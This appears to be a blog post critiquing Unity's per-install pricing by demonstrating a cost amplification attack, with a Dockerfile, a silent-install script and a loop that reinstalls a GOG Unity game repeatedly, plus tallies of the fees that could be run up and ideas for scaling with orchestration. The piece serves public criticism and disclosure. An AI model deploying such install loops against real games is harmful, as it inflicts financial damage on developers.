Unity
Intro
Unity have made some interesting choices with regard to their new pricing scheme.
https://unity.com/pricing-updates
Unity claims it will cost $0.20 per install (even pirated) on a unity personal or plus license.
This may permit an amplification attack, where the attacker expends $0.002 & costs the developer/publisher $0.2. In so doing a malicious entity can inflict costs on their targets without providing the developer with a single cent.
An example scenario might be a malicious developer who is competing with a peer. This attack provides means to either shut down the peer, or disrupt the income that supports development of their next game. Ultimately providing advantage to the malicious developer and allowing them launch their game first.
We are all aware of how broken and laughable this model is, but I thought it a good idea to demonstrate the potential cost.
Practical
GOG provide DRM free games which can be installed without user input, some of which I own & of those, some are unity based.
I intended to establish what the potential costs to a developer might be and chose an undisclosed game for this purpose.
The chosen game was so because it was small, provided by GOG, used unity & created by an entity opposed to Unity's pricing model and might be sympathetic to my efforts rather than litigious.
I created the following docker file
FROM ubuntu
ADD game.exe /game.exe
RUN apt-get update -y; apt-get upgrade -y
RUN apt-get install wine -y
RUN dpkg --add-architecture i386 && apt-get update && apt-get -y install wine32
RUN apt-get install xvfb -y
RUN export DISPLAY=:0
RUN apt-get -y install winetricks
ADD script.sh /script.sh
RUN chmod +x /script.sh
RUN winetricks --self-update
CMD /script.shScript.sh
#!/bin/bash
# prove the app isn't installed
ls -lah /root
xvfb-run wine /game.exe /silent
# ensure the app is installed
ls -lah /root/.wine/drive_c/GOG\ Games/Built the image
sudo docker build ./ -t moneydrainRun the image
sudo docker container run -it moneydrainThis container was created and run for 1 hour, on non-dedicated hardware.
#!/bin/bash
duration=$((60 * 60))
iterations=0
start_time=$(date +%s)
while true; do
sudo docker container run --rm -it moneydrain
((iterations++))
current_time=$(date +%s)
elapsed_time=$((current_time - start_time))
if [ "$elapsed_time" -ge "$duration" ]; then
break
fi
done
echo "Total iterations: $iterations"During that time it was able to install the game 72 times (~50 seconds per install).
Conclusion
72 * 0.2 = 14.4
**$14.4 an hour cost to this developer at a total cost of almost zero to the attacker.
This totals $126,230.4 if run for a single year.
Unity do claim that the cost is only incurred per device, however to the unity runtime, each container would appear to be a new device.
The cost may also only trigger when the application is run rather than installed, this could also be performed within this environment and likely increase cost as the install could be baked into the container image.
In this test only one container was run at a time, this is not a limitation and it would be possible to paralellise this process on a single host or across multiple with orchestration engines like swarm or kubernetes. In any case, each install will almost certainly cost significantly less than the amount expended.
I hesitate to suggest that developers move engines or drop tools they are familiar with, but I fear that this will just drive users towards epic's unreal engine. Unfortunately when the shareholders get greedy we could see this type of anti-everyone behavior again in future. Given this is the case, perhaps an alternative where this could not happen should be considered.
Finally there are some additional thoughts. Currently we're using the broad term "install", it may be the case that a request is made to an API on first launch of a game, in that case there would be concerns that the cost of attack would be even lower, something as simple as a curl would be enough to trigger the charging mechanism.